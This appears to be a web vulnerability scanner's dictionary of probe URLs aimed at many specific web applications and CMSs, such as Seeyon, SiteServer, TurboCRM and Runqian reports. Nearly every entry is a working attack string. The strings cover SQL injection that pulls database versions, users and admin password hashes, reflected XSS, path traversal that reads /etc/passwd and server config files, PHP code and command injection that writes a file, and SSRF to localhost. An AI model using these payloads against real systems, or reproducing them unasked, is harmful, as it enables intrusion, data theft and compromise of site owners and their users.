/poweb/CDHelp.jsp?ISOID=3'%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,char%28104%29%2bchar%28107%29%2bchar%2858%29%2bchar%2849%29%2bchar%2858%29%2bchar%2849%29%2bchar%2857%29%2bchar%2857%29%2bchar%2855%29,null,null,null%20%20--%20
/price.asp?kind=1%27%20UNION%20ALL%20SELECT%20NULL%2CCHR%28106%29%26CHR%2858%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/print/search_print_proof.jsp?proof_no=just_sql_test'
/private/
/product-xxx-%3Cscript%20language=%22php%22%3Eecho%20%22webscan%22;-_set_compile.html
/product_view.asp
/productpic.aspx?id=100611)%20and%201=char(106)%20--
/products.asp
/prog/get_passwd_1.php?user=hehe%3Cscript%3Ealert(42873)%3C/script%3E%20
/projects
/protextbox.asp?hw_%69d=513%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,chr(88),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin
/prozhanshi/yuxi.aspx?id=-306'%20and%201=char(106)%20and%20'at'='at
/prozhanshi/zice.aspx?id=-101'%20and%201=char(106)%20AND%20'at'='at
/pub/downloadfile.php?DontCheckLogin=1&url=/datacache/../../../tsvr/turbocrm.ini
/pub/help.php?key=YToxOntpOjA7czozMDoiLy4uLy4uLy4uLy4uL3RzdnIvdHVyYm9jcm0uaW5pIjt9
/pub/help2.php?key=/../../tsvr/turbocrm.ini
/pub/search/default.asp?id=-1/**/and/**/1=char(106)--
/pub/search/search_video.asp?id=79/**/and/**/1=char(106)--&mid=51
/pub/search/search_video_bc.asp?id=12&mid=-1/**/and/**/1=char(106)--&yh=1
/pub/search/search_video_view.asp?id=3&mid=4%20and%201122=CONVERT(INT,(SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29))&yh=1
/public/
/public/jspdownload.jsp?FileFullPath=%5Cetc%5Cpasswd&FileName=passwd
/public/jspdownload.jsp?FileFullPath=c:%5Cwindows%5Cwin.ini&FileName=win.ini
/public/minify.php?f=../ooxxooxxo/hehe.js
/queryserverinfo.php?puchanid=%28select%201%20from%20%28select%20count%28%2a%29%2Cconcat%28concat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29
/queryserverinfo.php?type=4&=3&puchanid=-1+or+1=1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*),CONCAT(md5(0x7765627363616e),0x3a,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
/radcontrols/editor/dialog.aspx?dialog=ImageManager&editorID=');%3C/script%3E%3CScRiPt/acu%20src=1%20onerror=alert(42873)%3E%3C/ScRiPt%3E%3Cscript%3E//&language=zh_CN&sessionID2=8ca6abaf-d361-328c-9178-%20f78311cd0329&UseEmbeddedScripts=yes&useSession=0
/redmine/
/report/reportServlet?action=4&url=http://127.0.0.1&file=wait_trace.raq&columns=0&srcType=file&width=-1&height=-1&cachedId=A_2&t_i_m_e=&frame=stu_saveAs_frame--%3E%3C/sCrIpT%3E%3CsCrIpT%3Ealert(42873)%3C/sCrIpT%3E
/reports/CreateReportTable.jsp?site=0
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
/resin-doc/viewfile/?file=index.jsp
/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=%CF%C3%C3%C5%B4%F3%D1%A7&subject1=0&subject2=0&name=%25%27%20AND%201122%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%28104%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2849%29%7C%7CCHR%2857%29%7C%7CCHR%2857%29%7C%7CCHR%2855%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27
/respond.php?code=alipay&subject=0&out_trade_no=%00'order%20by%20010101010webscan%20--%20(
/resume/?key=xxxx%bf%22;alert(360);//
/robots.txt
/robots.txt/360.php
/rss.php?module=news&attasql=union%20select%201,reer,3,4%20from%20boka_members%20where%20uid=1%20order%20by%20id%20asc%20%20--%20a
/s/click.php?bGlua19pZD0nIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLHZlcnNpb24oKSwweDdlKSwwKSM=
/s/go.php?bGlua19pZD0nIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLHVzZXIoKSwweDdlKSwwKSM=
/samples/
/schedule/Entrust.aspx?nidlist=0,1)/**/and/**/1=CHAR(106)%20--
/script
/scripts/
/scripts/uistrings.cgi
/scrp/feedbackdetail.cfm?iSno=-4321%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20
/scrp/feedbackdetail.cfm?iSno=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/seach.php?cat2id=-8%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%23
/search.do?searchInfo=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
/search.php?mod=information&ids=1-webscan&catid=1
/search.php?part=course&keywords=%27/**/AND/**/(SELECT/**/1/**/FROM(SELECT/**/COUNT(*),CONCAT(version(),(0x7C),md5(1122),(0x7C),FLOOR(RAND(0)*2))x/**/FROM/**/INFORMATION_SCHEMA.CHARACTER_SETS/**/GROUP/**/BY/**/x)a)/**/and/**/%27a%27=%27a
/search.php?query=a';?%3E%3C?exit(sha1('360webscan'));?%3E&modelid=1%20or%202=2
/search/index/portalId/427?keyword=1'%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(114)%7C%7Cchr(101)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(114)%20FROM%20dual)))%7C%7C'
/search2/shelves_checkout.jsp?library_id=A&rec_ctrl_id=-1%27+and+1=2+union+select+NULL,char(106)%2bchar(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
/searchLines.aspx?LName=h%25';
/searchLines.aspx?LName=h&t=webscan()'
/secure/Signup!default.jspa
/seeyon/main.do?method=certDown&realPath=../../base/conf/datasource.properties%00a
/seeyon/management/status.jsp
/selfservice/downfile/down?id=-1%20union%20all%20select%20db_name(),2,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/selfservice/infomanager/board/downboardview?id=-1%20union%20all%20select%20db_name(),2,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/selfservice/welcome/downboard?id=-1%20union%20all%20select%20db_name(),2,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/selfservice/welcome/downboardview?id=-1%20union%20all%20select%20db_name(),2,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/server-info
/server-status
/servermanage.php?NodeID=-1&SelType=-1%29%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%23
/servermanage.php?SelType=-1)%20AND%20(SELECT%20360%20FROM(SELECT%20COUNT(*),CONCAT(0x3A703A,(MID((IFNULL(CAST(md5(0x7765627363616e)%20AS%20CHAR),0x20)),1,50)),0x3A713A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20(1=1
/service/local/outreach/welcome/nexusSpaces.css
/service/showdevice.php?iDeviceId=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23
/servlet/FileDownload?filepath=/etc/passwd&dispname=42873.txt
/servlet/FileDownload?filepath=c:/windows/win.ini&dispname=42873.txt
/servlet/FileUploadServlet?fileName=../WEB-INF/proxool.xml
/servlet/HistoryDownLoad?id=-1%20union%20all%20select%201,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/servlet/OutputCode?path=c:/windows/win.ini
/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../../../etc/passwd
/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../conf/resin.conf
/servlet/com.runqian.report.view.html.GraphServlet?picFile=../../../../../../../../conf/resin.conf
/servlet/hirelogin/BrowseFileServlet?dbName=Usr&a0100=-1'%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/servlet/hirelogin/BrowseFileServlet?dbName=Usr&i9999=-1%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/servlet/hirelogin/BrowseFileServlet?dbName=k00%20where%201=2%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/servlet/performance/fileDownLoad?article_id=-1%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/servlet/performance/fileDownLoad?opt=hire&e01a1=-1'%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/servlet/performance/fileDownLoad?opt=workView&file_id=-1%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/servlet/performance/fileDownLoad?opt=workView&file_id=-1&p0100=-1%20union%20all%20select%20CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE),2--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/setMaterials.do?ITEM_ID=12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/setup/setup1.jsp
/sgin/filemanage/default.asp?action=viewfolder&path=
/share.php?F_email=test@vul.org%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/test
/shipinbofang.jsp?TID=-1234'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL%20FROM%20DUAL--%20&ColumnID=86
/shop.php?ac=view&shopid=1-cfreer
/shop.php?ctl=index&act=ajax_purpose_store&purpose_id=1%20and%20(select/**/%201%20from/**/%20(select/**/%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from/**/%20information_schema.tables%20group%20by%20x)a)%23
/show.asp?id=2621%20union%20SELECT%201,2,0x7700650062007300630061006E003A0066006F0075006E0064003A00760075006C00,4,5,6,7,8,9,10,11,12,13,14,15,16%20FROM%20ADMIN
/show.aspx?type=1&action=GetImg&pids=(select%20char(58))
/show.jsp?id=5'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20AND%20'AT'='AT
/showmanufacturer.aspx?categoryfilterid=-12%20and%201=char(106)&manufacturerfilterid=1&distributorfilterid=0&affiliatefilterid=0&customerlevelfilterid=0&producttypefilterid=0&show=all
/shownews.aspx?newsno=-1'%20AND%201=CHAR(106)%20--
/shownews.aspx?newsno=-1'%20and%201=char(106)%20--
/showproduct.aspx?ProductID=6559&CategoryFilterID=-51%20or%201=char(106)
/showsearch.aspx?HotSearchWord=-1';%20if(12=13)%20select%201234%20else%20drop%20function%20jjyy%20--
/showtopiclist.aspx?direct=0%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&forumid=-1&order=1&page=1&search=1&type=
/showtopiclist.aspx?direct=0&forumid=-1&order=1%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&page=1&search=1&type=
/siteserver/UserRole/background_userAdd.aspx?UserName=1122'%20and%20char(106)%20=1%20--&ReturnUrl=../cms/console_user.aspx
/siteserver/UserRole/modal_userView.aspx?UserName=dd'%20and%201=char(106);--
/siteserver/cms/console_tableMetadata.aspx?ENName=cms_Content%27%29%20and%200%3C%28select%20top%201%20isnull%28cast%28%5Breer1122%5D%20as%20nvarchar%284000%29%29%2Cchar%2832%29%29%20from%20bairong_Administrator%20where%201%3D1%20and%20UserName%20not%20in%20%28select%20top%200%20UserName%20from%20bairong_Administrator%20where%201%3D1%20group%20by%20UserName%29%29%3B--
/siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%20char(106)=1%20--
/siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1111'%20and%20char(106)=0%20--
/siteserver/userRole/modal_sendMail.aspx?From=User&UserNameCollection=test'+and+char(106)%2bchar(106)=0%20--
/sofpro/SltGecsMember?actiontype=WEB_EDIT_DETAIL&member_seq=-1
/solr/dev/admin/
/specialty.asp?Tbynf=1%20and%201%3Echar(106)%20--
/sql.inc
/sqoa/faWenAction.do?step=toRead&readFile.id=&readFile.fileId=../../../../../../../../../etc/passwd&readFile.type=txt
/sssweb/onlineVote/fvote.aspx?questionnaireID=-11'%20and%201=char(106)%20--
/stat/stat.aspx?statid=1'%20And%201=(select%20db_name())%20--
/statistics.php?pageurl=pageurl&referer=http://www.baidu.com/?wd=aaaa%2527),((select%201%20from%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2,3,4,5,6,7,8,9)%23
/statistics.php?referer=http://www.google.com/search?q=a%2527),(null,null,null,null,null,null,null,null,(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20concat(user_name,0x7c,password)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b))%23&b=c&pageurl=1
/store.php?Uid=1-db_mymps-my_member%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/styles/outlook1/tools/calendar/calEditEvent.php?action=edit%22%3E%3Cscript%3Ealert(42873)%3C/script%3Ebad=%22&calid=
/subareamanage.php?NodeID=-1%20UNION%20SELECT%201%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%23
/subareamanage.php?Page=1&&DelNode=1&NodeType=-1%20or%201=1%20and%20(SELECT%201%20and%20ROW(1,1)%3E(SELECT%20COUNT(*),CONCAT(md5(0x7765627363616e),0x3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)
/suggestwordList.php?searchWord=a&language=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20md5(1122)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)
/superadmin/
/swfupload/upload_files.php?uid=1%7Cecho+cedar+%3E%3Eohehe.php
/sys/user/addfunction.jsp?RoleID=1')%20UNION%20all%20SELECT%200x3E5F6F686568655F3C,NULL,NULL,NULL,NULL,NULL,NULL%23
/sys/user/agenttree_xml.jsp?_conf_type=user&_parent_id=1'%20UNION%20all%20SELECT%20NULL,NULL,0x3E5F6F686568655F3C,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%23
/sys/user/changedept.jsp?DeptID=1'%20UNION%20ALL%20SELECT%200x3E5F6F686568655F3C,NULL%23&AgentID=1
/sys/user/p_dept_group_seldept.jsp?GroupID=1')%20UNION%20all%20SELECT%200x3E5F6F686568655F3C,NULL,NULL,NULL%23
/sys/user/portal_module_permission_parts_xml.jsp?_conf_type=user&_parent_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,0x6A7573743A693A66696E64,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%23
/sys/user/webagentlist.jsp?DeptID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,0x6A7573743A693A66696E64,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%23
/sys/user/webagenttree_xml.jsp?_parent_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,0x6A7573743A693A66696E64,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%23
/sysinfo.jsp
/system/
/system/config/groupTreeXml.jsp?type=group&SG04=1'+UNION+ALL+SELECT+1,CHAR%2859%29%2bCHAR%28106%29,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--
/system/login.asp
/system/login.aspx
/system/login.jsp
/system/login.php
/system/nhome/login.jsp?message=%22)--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/systems/dept/dept_edit.aspx?CodeId=-4)%20and%201=char(106)--&id=1057
/temp/compiled/pages.lbi.php/%22%3C/form%3E%3CsCripT%3Ealert(42873)%3C/scRipt%3E
/templates/
/tender/tender/findlssuingBytender.action?currentPage=1&pageSize=10&returnWayId=0&moneyUseId=0&periodTimeId=0&periodDayId=0&award=2&money1=1%20and%20(select%201%20from%20(select%20count(*),concat(md5(0x221),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23&money2=1&satate=100
/test.asp
/test.aspx
/test.jsp
/test.php
/tj/list.aspx?typeid=1'%20and%20(char(106)%2bchar(106))%3E0--
/tj/total.aspx?act=other&typeid=1%27%20AND%209518%3DCONVERT%28INT%2C%28SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2b%28SELECT%20%28CASE%20WHEN%20%289518%3D9518%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2bCHAR%28100%29%29%29%29%20AND%20%27xhJK%27%3D%27xhJK
/toall/desktop/dbform.asp?fn=&fntxt=&varid=8%20AND%201122%3DCONVERT%28INT%2C%28CHAR%2899%29%2bCHAR%28102%29%2bCHAR%28114%29%2bCHAR%28101%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28106%29%2bCHAR%28120%29%29%29
/tools/life/jiufang/?q=%7B%24%7Bexit%28md5%28%27fdsfdsfds%27%29%29%7D%7D
/tophp.asp
/tp_2_2/real_time_rfc2544_result.jsp?testTime=/../../../../../../../../etc/passwd%00
/treefordevicelog.php?iSub=1&id=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23
/treeformap.php?iSub=1&id=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23
/treeforrecordalarm.php?iSub=1&id=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23
/truexxgk/app/nrglController/loadZwgk?zdjc=reer'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&type=1
/truexxgk/app/xxgkznController/firstXxgkznByZdjc/'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/tt/trade/register.asp?step=checkdup&checkname=ologinname&checkval=haha'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&pk=0
/tuan.php?ctl=order&search=YToxOntzOjc6InNlX25hbWUiO3M6Mjg1OiInIGFuZCAwIHVuaW9uIHNlbGVjdCAxLG1kNSgweDc3NjU2MjczNjM2MTZlKSwzLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLDI0LDI1LDI2LDI3LDI4LDI5LDMwLDMxLDMyLDMzLDM0LDM1LDM2LDM3LDM4LDM5LDQwLDQxLDQyLDQzLDQ0LDQ1LDQ2LDQ3LDQ4LDQ5LDUwLDUxLDUyLDUzLDU0LDU1LDU2LDU3LDU4LDU5LDYwLDYxLDYyLDYzLDY0LDY1LDY2LDY3LDY4LDY5LDcwLDcxLDcyLDczLDc0LDc1LDc2LDc3LDc4LDc5LDgwLDgxLDgyLDgzLDg0ICMiO30=
/tuan.php?ctl=subscribe&act=unsubscribe&code=JyBhbmQgKHNlbGVjdC8qKi8gMSBmcm9tLyoqLyAoc2VsZWN0LyoqLyBjb3VudCgqKSxjb25jYXQobWQ1KDExMjIpLGZsb29yKHJhbmQoMCkqMikpeCBmcm9tLyoqLyBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj
/u.php/member-login?id=header_login%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%2842873%29%3C/ScRiPt%3E&style=1
/u8qx/login_SelectDM.jsp?type=tree&select=slGS&id=inputDW&cdtn=kjnd=-4622%20UNION%20ALL%20SELECT%20CHAR%28113%29%2bCHAR%28107%29%2bCHAR%28107%29%2bCHAR%2898%29%2bCHAR%28113%29%2bCHAR%2875%29%2bCHAR%28122%29%2bCHAR%2874%29%2bCHAR%28103%29%2bCHAR%28118%29%2bCHAR%28103%29%2bCHAR%2888%29%2bCHAR%2875%29%2bCHAR%2879%29%2bCHAR%2887%29%2bCHAR%28118%29%2bCHAR%28121%29%2bCHAR%28122%29%2bCHAR%28107%29%2bCHAR%28115%29%2bCHAR%2886%29%2bCHAR%2873%29%2bCHAR%2885%29%2bCHAR%28118%29%2bCHAR%28104%29%2bCHAR%28119%29%2bCHAR%28108%29%2bCHAR%2879%29%2bCHAR%2885%29%2bCHAR%2865%29%2bCHAR%28102%29%2bCHAR%28100%29%2bCHAR%2868%29%2bCHAR%2899%29%2bCHAR%2887%29%2bCHAR%28101%29%2bCHAR%2883%29%2bCHAR%28106%29%2bCHAR%2869%29%2bCHAR%2880%29%2bCHAR%2868%29%2bCHAR%2890%29%2bCHAR%28106%29%2bCHAR%2897%29%2bCHAR%2882%29%2bCHAR%28113%29%2bCHAR%2898%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28113%29,48,48%20--%20-
/uapws/
/uapws/service/
/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl
/uc_server/admin.php
/uc_server/data/config.inc.php.bak
/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:80&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
/upload/
/uploads/
/user
/user.php?act=is_registered&username=%CE%27360webscan%23
/user.php?back_act=http://127.0.0.1%22style=x:expression(alert(42873))%3E
/user/?q=help&type=search&page=1&kw=webscan%22;%20alert(42873);//&lang=zh_CN
/user/City_ajax.aspx?Cityid=-1'%20%20union%20%20SELECT%20'webscan',2%20FROM%20fs_sys_User%20WHERE%20id=7%20%20and%20'1'='1
/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+20120328,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
